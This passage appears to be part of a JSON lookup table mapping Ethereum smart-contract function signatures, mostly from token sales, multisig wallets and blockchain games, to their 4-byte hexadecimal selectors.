"0x7053fe8d", "cancel_contract()": "0xa7f8fbd4", "evaluate_model(uint256)": "0x10b787d1", "reveal_test_data(int256[],int256)": "0x3dc37539", "get_submission_queue_length()": "0x89128b70", "get_testing_index()": "0x39d51cc0", "get_training_index()": "0x251fbe37", "init3(int256[],int256)": "0x5cd27e8d", "init2()": "0x069489a2", "Danku_demo()": "0x61fc703c", "LordCoinPreICO(address,address,uint256,uint256,uint256,uint256)": "0x2787fac2", "AthaYOGAToken(address,address)": "0x76b547b8", "CryptoDegree()": "0x7c337086", "LAFINAL3()": "0xa2fc2254", "STARBITToken(address)": "0xf4f864f0", "VETRI(uint256,string,string)": "0x0a4dea01", "Expread()": "0xab99deb8", "ArthToken(uint256)": "0xc40d4163", "auth(string)": "0xe4db2ceb", "deliverManagementTokens(address)": "0xf449958d", "deliverTokens(address,uint256)": "0x4dd49e08", "trackHolder(address)": "0x39714adb", "LCDToken(address,address,address,address,address,address)": "0x5a17877a", "setExclude(address,bool)": "0x961d3cd3", "CBMTToken()": "0xe21be4f4", "Quicketh()": "0x73305f14", "LOTE(uint256,string,string)": "0x3f4ad13d", "BAXI()": "0xe847ca9c", "ICO(uint256,uint256,uint256,uint256,address)": "0xab0cba56", "RDT()": "0x5c6ce321", "ArthurStandardToken(uint256,string,uint8,string)": "0xc875d16f", "burnByOwner(address)": "0x6c768200", "SurrusContract()": "0xb8254880", "TOXTToken()": "0x61e8ee04", "CNC()": "0x632473da", "SmzdmToken()": "0x24676ae3", "reflect(string)": "0xc1ce53fc", "setReflectSwitch(bool)": "0xa58fd85b", "setBlacklist(address)": "0x4e054a67", "closeBlacklistSwitch()": "0x9aef319f", "unWhitelistAddresses(address[])": "0xfc434891", "unWhitelistAddress(address)": "0xcac9ffee", "removeWhitelistAdmin(address)": "0x6897e974", "addWhitelistAdmin(address)": "0x7362d9c8", "RaiblocksClassic()": "0xbba4c282", "MOBOL()": "0xb8c508e5", "proverka6()": "0x6fe12f07", "LolaCoin()": "0x0b0608db", "ALD()": "0x7bc62dc3", "withdrawCoins()": "0xffbb62a3", "BitplusToken()": "0x6fab94c1", "transferExecutor(address)": "0x0216f544", "MaecenasCrowdsale()": "0xa758ac6a", "claimCofounditTokens(address)": "0x6f500df5", "sanityCheck()": "0x7246de3d", "GFCB()": "0xa59f8a2b", "Delete()": "0xe046c4dc", "ChangeBuyer(address)": "0x3dbe6469", "Money(address)": "0x6348c4cf", "ADDOCoin()": "0xb10eabe8", "transferTokenFrom(address,address,address,uint256)": "0xe5994905", "redeem(address,address,uint256)": "0x0e6dfcd5", "AWMVoucher()": "0xbbdefbbb", "balancesImporter1()": "0x5f800348", "BOBOToken()": "0x9a158883", "switch_period()": "0x5d671fc0", "MatchPay()": "0x0a1a802e", "RTCCOINERC20(uint256,string,string)": "0x76f6de69", "EOJ()": "0xb2240566", "MMC(uint256,string,string)": "0xa6cfaf2e", "getCompte_44()": "0xf8fd72ac", "setCompte_44(string)": "0x866d840a", "getCompte_43()": "0xeea42151", "setCompte_43(string)": "0xd962dd99", "getCompte_42()": "0xea737b54", "setCompte_42(string)": "0x74dd7be9", "getCompte_41()": "0xbe99ed6f", "setCompte_41(string)": "0x1067f077", "getCompte_40()": "0xf56898fe", "setCompte_40(string)": "0x03122043", "getCompte_39()": "0x39633cee", "setCompte_39(string)": "0x5e6a7777", "getCompte_38()": "0xd72e4167", "setCompte_38(string)": "0xd0aa0313", "getCompte_37()": "0xa39aaec6", "setCompte_37(string)": "0x3cc0be9a", "getCompte_36()": "0xa9918dfc", "setCompte_36(string)": "0x5597e9dd", "getCompte_35()": "0x085e9579", "setCompte_35(string)": "0x3d937824", "getCompte_34()": "0xac6a602f", "setCompte_34(string)": "0x8564c284", "getCompte_33()": "0x0ef6eb9c", "setCompte_33(string)": "0x77669b2d", "getCompte_32()": "0x8e2d0699", "setCompte_32(string)": "0x9ee22f9a", "getCompte_31()": "0xf506d7e5", "setCompte_31(string)": "0x73a17e6d", "getCompte_30()": "0x47b84579", "setCompte_30(string)": "0x4f13fc0a", "getCompte_29()": "0x7775eec9", "setCompte_29(string)": "0x0721c6dd", "getCompte_28()": "0xd9d1d4bb", "setCompte_28(string)": "0xa6ec0708", "getCompte_27()": "0xa2bad039", "setCompte_27(string)": "0x25d76e6d", "getCompte_26()": "0x3ca95c89", "setCompte_26(string)": "0xfe1865cd", "getCompte_25()": "0x809841aa", "setCompte_25(string)": "0xc5ee5688", "getCompte_24()": "0x1e7c20ac", "setCompte_24(string)": "0xd2d9b8c6", "getCompte_23()": "0xbc5dfd7d", "setCompte_23(string)": "0x086e4e52", "getCompte_22()": "0x8216ed6c", "setCompte_22(string)": "0x95b8fdef", "getCompte_21()": "0xfedf1ed8", "setCompte_21(string)": "0x3b2b7fec", "getCompte_20()": "0x9712da8b", "setCompte_20(string)": "0xdaae7e98", "getCompte_19()": "0xbbb7d310", "setCompte_19(string)": "0x507d8887", "getCompte_18()": "0x9cdec2bb", "setCompte_18(string)": "0xc05b8066", "getCompte_17()": "0x85820925", "setCompte_17(string)": "0x8c6f2ec1", "getCompte_16()": "0x0f577d97", "setCompte_16(string)": "0xeb3fee82", "getCompte_15()": "0x177dc9e5", "setCompte_15(string)": "0x49499e14", "getCompte_14()": "0xc8db6af9", "setCompte_14(string)": "0x5dfed2bb", "getCompte_13()": "0xf7160766", "setCompte_13(string)": "0xb7a973bd", "getCompte_12()": "0xaac1c80b", "setCompte_12(string)": "0x8b7c34d4", "getCompte_11()": "0x29ccb4df", "setCompte_11(string)": "0xb52923a0", "getCompte_10()": "0xa8d34ea5", "setCompte_10(string)": "0xceead4b6", "getCompte_9()": "0xf686f019", "setCompte_9(string)": "0x7f9b48bc", "getCompte_8()": "0x7f5f17b1", "setCompte_8(string)": "0xef9fe3ac", "disableTokenSwapLock()": "0x3592f369", "mintTokens()": "0xeeb9635c", "freeToken()": "0x81c2d4b6", "SocialMediaMarketToken(uint256)": "0xdb0ad29c", "HelixexToken()": "0xfe6c19a4", "PrivateReserveCoin()": "0x410520f7", "BoltToken()": "0x993d1123", "Aramco()": "0xf8333e0e", "BoxxToken()": "0x6a4b8a3d", "TaskToken()": "0xda38f805", "getTokenInfoDataTracking()": "0xef02ad08", "getTokenInfoMaxTotalImbalanceList()": "0x1bf983a6", "getTokenInfoMaxPerBlockImbalanceList()": "0x59e541af", "getTokenInfoTokenList()": "0x4395dc06", "signToApproveTokenControlInfo(uint256)": "0x8e05d59d", "getAddTokenDataTracking()": "0xfff3ad33", "signToApproveAddTokenData(uint256)": "0xac0a04b2", "SPPSeriesA(uint256,string,uint8,string)": "0x7ecdbf61", "RabbitCoin(uint256,string,string)": "0x82f66ff0", "Electronero()": "0x5bbe6790", "SSHToken(uint256,string,uint8,string)": "0xa8103c80", "TRBToken()": "0xc4c676cf", "manualWithdrawalFallback(address,uint256)": "0xae01ed8a", "enableWithdrawal(bool)": "0x5636548f", "secondaryICO(bool)": "0x517880df", "setContractAllowance(address,uint256)": "0x45622c31", "setLockTime(uint256)": "0xae04d45d", "_getaward(uint256)": "0x4767aeec", "getAward(uint256)": "0x05989e9d", "_play(string,uint256)": "0x6cb520c6", "play(string,uint256)": "0x997636ec", "_initAwardInfo()": "0x6d11fe82", "ScratchTickets(string,uint256,uint256,address)": "0x50cd4f3f", "getFreeCoins()": "0xe430bb5b", "PlayCoin()": "0x071bdfbd", "authorizedTransfer(address,address,uint256)": "0xfc48b653", "setFreeCoins(uint256)": "0x14f1dcac", "unAuthorizeContract(address)": "0x8314dcb4", "EICToken(uint256,string,uint8,string)": "0xeea21c6e", "SwitzerlandvsCostaRica()": "0xd0ce659f", "TPOMZ()": "0x19811fc9", "ShadowBox()": "0xe6025572", "decimals(address)": "0xd449a832", "symbol(address)": "0xa86e3576", "giveBack()": "0x0de96dff", "unban(address)": "0xb9f14557", "giftTokens(address,uint256)": "0xc4c50acf", "buyTokensFor(address,uint256,uint256)": "0x8af2c328", "computeTokens(uint256,uint256)": "0x0afc0a59", "bookkeep(address,uint256,uint256)": "0x31711abe", "updateFundWallet(address)": "0x5ec38bec", "updateRestrictedVault(address)": "0x78ff54eb", "updateReserveVault(address)": "0x88d9fc4d", "updateVaults(address,address)": "0x01209d09", "startAllocation()": "0x9f52f381", "updateCaps(uint256,uint256,uint256,uint256)": "0xbeb7de13", "updateToken(address)": "0x7ad3def2", "MeritICO()": "0x58b435fb", "_nextFifoStorageKey(uint256)": "0x69ad56de", "_sharesValid(uint256,uint256)": "0xdd3e5f47", "transferFromContract(address,uint256,uint256)": "0x59b6f377", "nextPrice(uint256,uint256)": "0x68d7f8d6", "estimatePurchasePayment(uint256,uint256)": "0x579b9499", "_purchaseLoopFifo(uint256,uint256)": "0x5a051c47", "_owns(address,uint256,uint256)": "0xd18b93e6", "_createCompany(string,address,uint256)": "0x9104dbd2", "totalCompanies()": "0x3b4cc7a3", "sharesOwned(address,uint256)": "0xa6b57b5d", "chairmanOf(uint256)": "0xb2280b48", "shareHoldersOf(uint256)": "0x2e6e795c", "setCommissionPoints(uint256,int256)": "0x82330505", "setShareTradingEnabled(uint256,bool)": "0x33ef5698", "createContractCompany(string)": "0xfee0596f", "createPromoCompany(address,string,uint256)": "0x91ed6851", "CompanyToken()": "0x62dbdfef", "YunToken(address)": "0xc718b2bb", "unFrozenBalanceByIndex(uint256)": "0x59318b2c", "hasItBeenReleased(uint256)": "0x69115768", "YunMint(address)": "0x448a064f", "additional(uint256)": "0xfea7bcfb", "updatePublicityBalance(address,uint256)": "0x1f221d4c", "initShareRule6()": "0x8f6963df", "WithdrawalAfterGoalReached()": "0xeeb92294", "WithdrawalTokensAfterDeadLine()": "0x0c1f679f", "CrowdsaleLeviusDAO(address,address)": "0x9a2a1f75", "CCTC()": "0xd4e90e24", "hasAllowanceToRecieveTokens(address,address)": "0xca710013", "isCrowdsaleOpen()": "0x5a3320ff", "changeETHUSD(uint256)": "0xb3938edc", "tokensToMint(uint256)": "0xc37d1c8b", "BlocksquareSeriesA()": "0xcf00cba0", "tranferOwnership(address)": "0x83fc58b4", "INFLIV(uint256,string,uint8,string)": "0x0dc03ec7", "S26ICO()": "0x466559e2", "NBAT102(address,address,address,address,address)": "0x34c757cf", "addPresaleWhitelist(address,uint256)": "0x51e22125", "changeDeposit(address)": "0x0fdc3609", "allocateReserveAndFounderTokens()": "0x916891aa", "getTokenPriceInWEI()": "0x42ea74c0", "getCurrentBonusInPercent()": "0x3a232c2d", "removeKey(bytes32,uint256)": "0x53d413c5", "addKey(bytes32,uint256,uint256)": "0x1d381240", "getKeysByPurpose(uint256)": "0x9010f726", "keyHasPurpose(bytes32,uint256)": "0xd202158d", "PassportInterfaceID()": "0x77eb74a1", "ERC165ID()": "0x02e7491e", "resetPeerWallet()": "0x70d12c31", "getPeerTokens(address)": "0xe55b8b62", "getPeerOwnership(address)": "0x4001cee6", "calculatePeerTokens()": "0xc91ca6c7", "calculateOwnership()": "0xb25a7a9d", "calculateWalletTokens()": "0xfb350502", "validatePeer(address)": "0x9d73cecc", "removePeer(address)": "0x4c23ba50", "addPeer(address)": "0x2e9b50bd", "triggerInvestment()": "0xb171b18f", "launchInvestment()": "0xa3f5c03d", "completeInvestment()": "0xfb9c7303", "makeInvestment()": "0xc78bd060", "createPeerWallet(address,address[],address[],uint256[])": "0x33a581cd", "setWhiteListContractAddress(address)": "0xb6b57c9e", "launchPeerWallet(address[],address[],uint256[])": "0x87982928", "getPreviousPrice(bytes10)": "0x23260a8b", "getPreviousDate(bytes10)": "0x4a2cd48f", "getPrice(bytes10)": "0x53a97873", "getDate(bytes10)": "0xc3a62a68", "getState(bytes10)": "0x40ef4704", "updatePrice(bytes10,uint32,uint64,uint32)": "0xb0448884", "ItasToken()": "0x5b947f36", "TESTER(uint256,string,string)": "0x0036059c", "MetaFoxToken()": "0x4ec7344e", "changeTransferStepLock(bool)": "0xd1190b7f", "ConsToken()": "0x31852177", "BigerToken()": "0x4c007b35", "getActiveItemAt(uint256)": "0x96efbb9b", "getOwnItemCount(address)": "0xeb4df824", "getOwnerItemIds(address)": "0xa469e5aa", "mintFungible(uint256,address[],uint256[])": "0x78b27221", "mintNonFungible(uint256,address[])": "0xf9419088", "create(string,string,uint8,string,bool)": "0x9bb603bb", "transferFrom(address,address,uint256[],uint256[])": "0xd54e583a", "transfer(address,uint256[],uint256[])": "0x09d6b0a3", "nonFungibleOfOwnerByIndex(uint256,address,uint128)": "0x852ada4b", "nonFungibleByIndex(uint256,uint128)": "0x5439c6a1", "isNonFungibleItem(uint256)": "0x5e81b958", "isNonFungibleBaseType(uint256)": "0x7269a327", "getNonFungibleBaseType(uint256)": "0x6f969c2d", "getNonFungibleIndex(uint256)": "0x9cca1c64", "isFungible(uint256)": "0xadebf6f2", "isNonFungible(uint256)": "0xe44591f0", "safeMulticastTransfer(address[],uint256[],uint256[],bytes)": "0xdbd3c372", "multicastTransfer(address[],uint256[],uint256[])": "0x67fd9da3", "uri(uint256)": "0x0e89341c", "decimals(uint256)": "0x3f47e662", "symbol(uint256)": "0x4e41a1fb", "name(uint256)": "0x00ad800c", "setApproval(address,uint256[],bool)": "0xc35774a1", "safeBatchTransfer(address,uint256[],uint256[],bytes)": "0x368b2842", "batchTransfer(address,uint256[],uint256[])": "0xe39c6d80", "batchApprove(address,uint256[],uint256[],uint256[])": "0xd1bab4cc", "safeBatchTransferFrom(address,address,uint256[],uint256[],bytes)": "0x2eb2c2d6", "batchTransferFrom(address,address,uint256[],uint256[])": "0x17fad7fc", "safeTransfer(address,uint256,uint256,bytes)": "0xae28b68c", "approve(address,uint256,uint256,uint256)": "0x4f4df442", "safeTransferFrom(address,address,uint256,uint256,bytes)": "0xf242432a", "onERC1155Received(address,address,uint256,uint256,bytes)": "0xf23a6e61", "distribute(uint256,uint256,address)": "0x92bec5c3", "changeYDistAddress(address)": "0xcc822f54", "changeManagerAddress(address,address)": "0x29501ad6", "useVaults(uint256,uint256)": "0x315f81c5", "participate(uint256,address)": "0x13b18640", "becomeRenown(bytes32)": "0x6561e921", "AsOyToken()": "0x360cdf5e", "getFastestSpaceship()": "0x211a048a", "_getLuckySpaceshipMoney(uint256,uint256)": "0x5f7b764f", "_initSpaceship()": "0x75ad97bb", "makeMoney()": "0xe3e7c665", "addSpaceshipMoney(uint256)": "0x6b3b261c", "_cMoney(uint256,uint256,uint256,uint256)": "0x129441cf", "buyTicketByEarnings(uint256,uint256,string)": "0x52798dae", "_payTicketByEarnings(uint256,address)": "0xca3a3f0d", "addTicket(uint256,uint256,uint256)": "0x67a1b7dd", "_computePayMoney(uint256,address)": "0x2d13c164", "allocateAndFreeze(address,uint256)": "0x2281411b", "getYumerium(address)": "0x6b628816", "OmenoToken()": "0xca7c4e35", "BITMUZE()": "0x6a8c9cce", "IbizaERC20Token()": "0x8f97d03f", "changeFoundersWallet(address)": "0x0773aa85", "setPricing(uint256)": "0xe867ecda", "setParticipantWhitelist(address[],bool)": "0xb31e8889", "setFoundersTokenAllocation(uint256)": "0xa80955b1", "investInternal(address,uint256)": "0xfdbd8dd8", "UCtestCoin(uint256,string,uint8,string)": "0xe0089ce7", "LIRAX(string,string,uint256,string)": "0x2a943be1", "ShadowToken()": "0x83d158f0", "dhopakexchange(address,address,address,uint256,uint256,uint256)": "0x454a2266", "token_fallback(address,address,uint256,bytes)": "0xe1ea5e05", "eth_fallback(address,bytes)": "0x2f67cf56", "token_approve(address,address,uint256)": "0xad470886", "crowdSaleContract()": "0x51aadcdf", "SUPPLY_FOR_ADVISORSL()": "0xef7dd831", "TOKEN_SUPPLY_ICO()": "0xcbc8ae5f", "startICODate()": "0xb8d4b642", "tab()": "0xdb9cd8d3", "_yearTwoSupply()": "0xca0d01a6", "remainingPurchaseAmount()": "0x69b0abea", "marketAllocation()": "0x8108e54c", "lastState()": "0x2df80280", "tokensForInvestors()": "0x1b1c15d5", "emissionAddress()": "0xbcb32828", "APPROVE_OWNER()": "0x7fd5dd04", "longTermHolding()": "0x89712af3", "ShowADV()": "0xca03fdcd", "companyCapital()": "0xafd7b21e", "partition()": "0x2a14b80a", "getWithdrawalWallet()": "0xaecd15e3", "theInvestor()": "0x54e08f76", "MAX_SUPPLY_OF_TOKEN()": "0xad71a1fd", "creatorAddr()": "0x16552393", "withdrawTopUp()": "0xa8af232b", "maxFirstRoundTokenLimit()": "0x08c87809", "developmentTokens()": "0xad3429be", "modultradeStorage()": "0x99f5c357", "initPlatinum()": "0x8d3a5ded", "minPurchaseNum()": "0xc1fe5281", "getBetItemCount()": "0xef9130b9", "SALE2_CAP()": "0x54aac764", "totalsum()": "0x4cb5f1c6", "FREEZE_PERIOD()": "0x823c82ca", "trading_deactivated()": "0xd3fd311e", "stageFourCap()": "0x20abf417", "rate2()": "0xf555b815", "capDay3()": "0xb5cb6a17", "tournamentsReserve()": "0x293100c1", "DeathFactor_ii()": "0x2c4d25f5", "WAD()": "0x6a146024", "fiveHours()": "0x46315237", "sponsoredJackpotAmount()": "0x600720c2", "totalLosses()": "0xbf04820b", "ready()": "0x6defbf80", "incrementSupply()": "0x8f75374d", "deathData_v1()": "0xe7151828", "whitelistOff()": "0xaa84d4b1", "UNKNOWN_TYPE()": "0x2423a088", "bonus_percentage()": "0x72ff1773", "coloredTokenCount()": "0xb3549265", "BokkyPooBahsAutonomousRefundathonFund()": "0xac83e891", "icoSuccess()": "0x7118f854", "TransferActive()": "0x1e4bdf27", "endPreICOStage3()": "0xd9099f67", "smartToken()": "0xc3e8fb40", "refundStart()": "0xb9f4b5c2", "votingstage()": "0xc5465a23", "getDeathCoin()": "0xdacf18c7", "allowTransferWhitelist()": "0xe1005556", "totalAwards()": "0xf6e66c17", "privateBuyer()": "0x09fe89c8", "nextrafflenr()": "0x390c3434", "managementTokensDelivered()": "0xa254e662", "remainingWithdraw()": "0xddd6d79a", "issuedCount()": "0x0b0f7743", "dropUnitPrice()": "0xa39a2b76", "USDDecimals()": "0xe8425467", "firstStageRaised()": "0xabd6cb3c", "_bonusRatio1()": "0xdaa232ac", "kycAdmin()": "0xec9e7971", "LMOSupply()": "0x59e0b91a", "VULCAN_PROMETHEUS()": "0x574356b4", "maxPreICOandICOSupply()": "0x393e0c63", "withdrawal_party_b_gets()": "0x39c1852d", "keyEmployeeAllocation()": "0x226d2f86", "exFeeTotal()": "0xa38717f4", "SUCCESS_FLAG()": "0xd073ca3d", "totalLoadedRefund()": "0x45abc063", "allocation()": "0x88a17bde", "votingFee()": "0xdab306b1", "indexdate()": "0x59e33e35", "PRESOLD_ADDRESS()": "0x913dd846", "getMyChest()": "0x06e3d732", "totalChangedPixels()": "0xc4329ae5", "maxAttackPrizePercent()": "0xeccbc596", "migrationPeriod()": "0xab1e96e9", "restartGame()": "0x8d25af04", "icoHardCapInWei()": "0xf64efacb", "preIcoSold()": "0x7a545b0c", "parking()": "0x68e1569a", "investorMinimalBalance()": "0x05ee8d89", "responsavel()": "0xe3aa62b1", "gen0EndingPrice()": "0xab948374", "rollLo()": "0x2d462dbb", "INITIAL_VUP_TOKEN_SUPPLY()": "0x468ed002", "myTotalSupply()": "0x4302b3c8", "mineBalance()": "0x5dda837f", "getNoInvestor()": "0xfc196cf3", "eth()": "0x8c7c9e0c", "minSumICOStage3USD()": "0xe5189e2a", "fUseAmount()": "0xcf881ad9", "ICO_PRICE2()": "0xf88607e4", "TOKEN_SYMBOL()": "0x2a905318", "TOKEN_AMOUNT_PRE_ICO()": "0xa31c5436", "numBoards()": "0x94bf8862", "saleFirstPresaleEndBlock()": "0xa80a60fb", "rescue()": "0x1fbe1979", "mineableTokens()": "0xef8a22ac", "PRETDESupply()": "0x20f067a8", "RAY()": "0x552033c4", "Commission()": "0x27a2aee2", "etherPerSale()": "0x72bc9240", "lastContract()": "0xb1557c2c", "setupComplete()": "0xb6635be6", "companyPercent()": "0xccaab1ca", "ICO_POOL()": "0x6cbf3c8c", "checkpointBlock()": "0x9b05535f", "freeLotterySeconds()": "0xc166311f", "prizeMoneyQuantity()": "0x9042dcd9", "PRE_SALE_MIN_BUY()": "0x79a2bfa5", "lotteryPrice()": "0xdbea52d8", "airDropNumber()": "0xe8c4d328", "tier1Rate()": "0x160abc9d", "timeTransferbleUntil()": "0x51f2f1d1", "directorLock()": "0xffe2d77e", "marketplace()": "0xabc8c7af", "sumICOStage1()": "0x807eb7cd", "WALLET_PARTNER()": "0xf10a4f0a", "taxFeeBps()": "0x3b215823", "STARTING_SEEDS()": "0xc28d38a8", "numJobs()": "0x9212051c", "forkAddress()": "0xf157ea0b", "GatewayInterfaceAddress()": "0x961ffc68", "additionalMint()": "0x434622fe", "havedDistFoundCoin()": "0x352a482f", "ico1_startdate()": "0xd44aecb0", "m_leeway()": "0x1908c425", "erc20()": "0x785e9e86", "TOKENS_EARLY_BACKERS()": "0x69be51bb", "downPayment()": "0x56f50473", "unfrozePerDay()": "0x77fe2a0d", "sellToContract()": "0x52d3642d", "allocationsInitialised()": "0x83739eda", "communityHolder()": "0x78bba530", "PROMETHEUS_SHIP_PRICE()": "0xf7fc1bd6", "fees_()": "0x200373c9", "tixGenerationContract()": "0x178a9e2e", "reserveVaultAddr()": "0xc0f6a3f9", "tokenSaleActive()": "0xd65a4184", "roundLockAmount()": "0xf5b490d5", "nextWeaponID()": "0x91885e1d", "hasWithdrawnRake()": "0xcce3906b", "VotesNecessary()": "0xcab17220", "ICOEnded()": "0x62d9c267", "_owoAmount()": "0xb36763c9", "ticket_price()": "0x19d41c69", "ecosystemAllocation()": "0xc0f496ac", "numElementsOdd()": "0xc0740c16", "isMigrationPhaseOpen()": "0xc408efba", "halfyearteam()": "0x7572ead0", "tradable()": "0x54840c6e", "returnUnsoldSafeMedium()": "0xaa391317", "timeAfterSoftCap()": "0x378544df", "accountAddressForSponseeAddress()": "0xa188b8fd", "pendingInstallments()": "0xe7992845", "totalProfit()": "0x86001519", "payoutToOwnerIsLimited()": "0x84268051", "callbackGasLimit()": "0x24f74697", "SUPER_HERO_MULTIPLIER()": "0x00691967", "nAuditorsAlarm()": "0x7bb4c4da", "cbtFundDeposit()": "0xe9c93ce7", "totalEthReceivedinWei()": "0xd5ce44c1", "StatsSold()": "0x35fc7506", "randomness()": "0x36013189", "stageOneStart()": "0x1d2e18cd", "Ownable3()": "0xabbff658", "paidToPartners()": "0x650b147d", "getNewRegistry()": "0x70c8658a", "moveDataContractBalanceToWorld()": "0xd7b84f68", "targetWallet()": "0xb92620bd", "lifToken()": "0x38fab8c5", "platformLaunchDate()": "0x56bd928a", "ethartRevenueReward()": "0xe9361d34", "astrSold()": "0xbe92f334", "lastBlock_a4Hash_uint256()": "0xd87be21b", "balance0()": "0x1c69ad00", "weiRised()": "0x83fbc2b4", "detail()": "0x6b7cc44f", "TWO_YEAR_KEEPING()": "0x49082bef", "ContractInfo()": "0x7ad3c119", "initialExchangeRateForETH()": "0x08b0e909", "getThresold()": "0x56048edc", "m_contributionHistory()": "0x10793b50", "directorB()": "0x14139904", "ReleaseDate()": "0x8cf49cad", "ratePublicSale()": "0xf7fca8d3", "year1LockAddress()": "0x9b19a92b", "shrToken()": "0xb290ae06", "totalWeiReceived()": "0x88d12a4d", "preSaleTokenCap()": "0xabf45359", "useOraclize()": "0xf719e111", "MAX_TOKENS_FOUNDERS()": "0x3538b13a", "rateETHUSD()": "0x58fd955c", "getDthShop(address)": "0xa96b3ab8", "getDthTeller(address)": "0x78d0a415", "refundEth(address)": "0xd83edd70", "withdrawEth(address,address,uint256)": "0xf5923a6e", "addEthTeller(address,uint256)": "0xe4651465", "addTokenTeller(address,uint256)": "0x18a6d58b", "addTokenShop(address,uint256)": "0xd4d84da5", "withdrawDthShopAdmin(address,address)": "0x7139b595", "withdrawDthShop(address)": "0x3716f65d", "withdrawDthTeller(address)": "0xb71738f1", "setDth(address)": "0x5f7e7138", "KingXChainToken()": "0x756feedc", "isFunctionRemoveAuthorizedAddress(bytes)": "0x553a48fd", "executeRemoveAuthorizedAddress(uint256)": "0x5711b311", "MultiSigWalletWithTimeLockExceptRemoveAuthorizedAddress(address[],uint256,uint256,address)": "0x5958188d", "setConfirmationTime(uint256,uint256)": "0x1afd08a2", "changeTimeLock(uint256)": "0x7ad28c51", "MultiSigWalletWithTimeLock(address[],uint256,uint256)": "0x2f4cf60f", "DXYToken()": "0x08efde8b", "PetroNetworkToken()": "0xda9eeaeb", "checkPeriod()": "0x3887abb7", "RelestToken()": "0xd0914c8d", "ETHERECASHTOKEN(uint256,string,string)": "0x7c930a10", "withdrawWithFee(address,uint256,bytes32,address,uint256,bool)": "0x4a738bea", "checkWithdrawAddress(address,bytes32,address)": "0x5682d43d", "withdrawWithFee(address,uint256,uint256,bool)": "0xf23f2cbe", "freezeTokens(address,bool,uint256)": "0x22e113a3", "changeDefaultWithdraw(address,address)": "0x45629402", "getDepositWithdrawList(address,uint256[])": "0x7df83cd0", "getDepositWithdrawCount(address)": "0x196198fa", "getDepositInfo(address)": "0x5287ce12", "createDepositContract(address)": "0xaba9650e", "bindToken(address,address)": "0xc77bdfce", "getOneWithdrawRec(uint256)": "0x74cd5c0b", "getWithdrawNum()": "0xc5a88559", "getOneDepositRec(uint256)": "0xa9011990", "getDepositNum()": "0x00226eb5", "withdrawTokenToDefault(address,address,uint256,uint256,uint256,address)": "0x9bdd070d", "withdrawToken(address,address,uint256,address,uint256,uint256,address)": "0x66013bdd", "checkWithdrawAmount(address,uint256,uint256)": "0x68c31649", "recordWithdraw(uint256,address,uint256)": "0xab40340a", "authorize(address,address,uint256)": "0x47c35910", "chargeFeePool()": "0xd16edc15", "chargeFee()": "0x744c8c09", "dayWithdrawCount()": "0xf213aad2", "monthWithdraw()": "0xbe54f214", "dayWithdraw()": "0x5e3cbb7c", "singleWithdrawMax()": "0x7312aaae", "singleWithdrawMin()": "0x14361fd1", "MahalaToken()": "0x1eb96f7c", "NAGACOIN()": "0x2a71e729", "ECommercePaymentSystem()": "0xd6bafa0c", "VRToken()": "0x41e62be6", "sendBountyBalance(address[],uint256[])": "0xfc998981", "removeBountyAddresses(address[])": "0xfe00779e", "addBountyAddresses(address[])": "0x45bd7f03", "sendFutureFundingBalance(address[],uint256[])": "0x2dab0374", "sendFoundersBalance(address[],uint256[])": "0x6c4db7cc", "sendAdvisorsBalance(address[],uint256[])": "0xb76c5c9f", "endICO(uint256)": "0xf5a332f6", "DatareumToken()": "0xc97dc17b", "hasCrowdsaleFinished()": "0xd02d08b2", "LENDXCOIN()": "0x67cd64dc", "ScamStamp()": "0x3943909e", "ScamStampToken()": "0x9378f08f", "__uintToBytes(uint256)": "0xd1f34b14", "__stringToUint(string)": "0x63c3600b", "changeMinimumTimeBeforeUpdate(uint256)": "0x5b824208", "unsetMyIdentity(uint256)": "0x558f285f", "unsetIdentity(uint256,address,address)": "0x35af2c4f", "getCustomerServiceAddress()": "0xc6199b6d", "getUpgradability(uint256,address,address,string)": "0x8ea04cb3", "isStoreSet(string)": "0x1343ed05", "__getStore(uint256)": "0x52ad2aa8", "setCustomerService(address,address,bool)": "0x682a9449", "switchClaimerAndRemoveOldOne()": "0x86321f95", "setNewClaimer(address,address)": "0x33c84990", "setClaimer(address,address)": "0xf5cf673b", "setAStore(string,address,address)": "0x1f29bdcf", "isUid(string)": "0x8ec5ff41", "getAddressLastUpdate(address,address)": "0xba2a730b", "getAppId()": "0x693dde5c", "getAppNickname()": "0x44ae2c03", "unsetIdentity(address,address)": "0xbe6c61f5", "setIdentity(address,address,string)": "0x33545d48", "isUpgradable(address,address,string)": "0xfab9b243", "Beonbox()": "0xa4bb43d2", "Goochain(uint256,string,uint8,string)": "0x067a2f3e", "withdrawLatium(uint256)": "0xf22513a7", "_tokensToSell()": "0x8b07b006", "minimumPurchase()": "0xaa2de6c3", "LatiumSeller()": "0xeb88e84d", "tokenRelease()": "0xcac35112", "LULUToken()": "0x24545f82", "startPreSale(uint256,uint256,uint256,uint256)": "0x08d4073d", "PreICO(address,address,uint256,uint256)": "0x457770d8", "GangnamTokene(address,address)": "0x2163ef1a", "TRLToken()": "0x1c350d6b", "multiMerge(address[],uint256[])": "0xd83f24a2", "merge(address)": "0x774120fa", "withdrawCAT()": "0xc91bc856", "changePaymentDestination(address)": "0x875dc0ee", "collectPayment(address,uint256)": "0xc119d019", "disableService(address)": "0x9cc9b86d", "enableService(address)": "0xb618214a", "CATServicePaymentCollector(address)": "0xb8068a5f", "processOneCombat(uint32,uint32)": "0xd3f9ba69", "getFighterInfo(uint32,uint32)": "0x220f9dfd", "setFighters(uint32,uint32,uint256[])": "0x2b49d9e5", "releaseOldData()": "0x0b368627", "setBaseInfo(address)": "0xb9fea3bb", "RabbitArena(address)": "0xb176a0b4", "getFighter(uint256)": "0x889fa1dc", "isCamp()": "0xf3382694", "NCAAChampionship()": "0x7f64d2d3", "StandardFormula()": "0xd0fc35cf", "Allysian()": "0x78018581", "_destroyContract()": "0xb0532349", "setReceiver(address)": "0x718da7ee", "setNewOwner(address)": "0xf5a1f5b4", "isTransferValid(address,address,uint256)": "0x40ecb7f2", "DaaToken(string,uint8,string,uint256)": "0x7896904e", "setBountyTeamUnfreezeTime(uint256)": "0x4815d83f", "freezeUntil(address,bool)": "0x67c9d266", "IronHands(uint256,address)": "0x2905be9a", "BKKToken()": "0x7d78ef4a", "Exera()": "0x33985caf", "withdrawStocks()": "0xeb79ec7c", "sellMyTokensStocks()": "0xe662ff97", "getMeOutOfHereStocks()": "0xbc537bae", "deleteBag(uint256)": "0x41f64b85", "getBagCount()": "0xf3548cd3", "getBag(uint256)": "0xe308c213", "setBagMultiplier(uint256,uint256)": "0xe1ed7fcb", "setStartingPrice(uint256)": "0x0f73b4f4", "setTimeout(uint256)": "0xc58a34cc", "createBag(uint256)": "0x8558c0af", 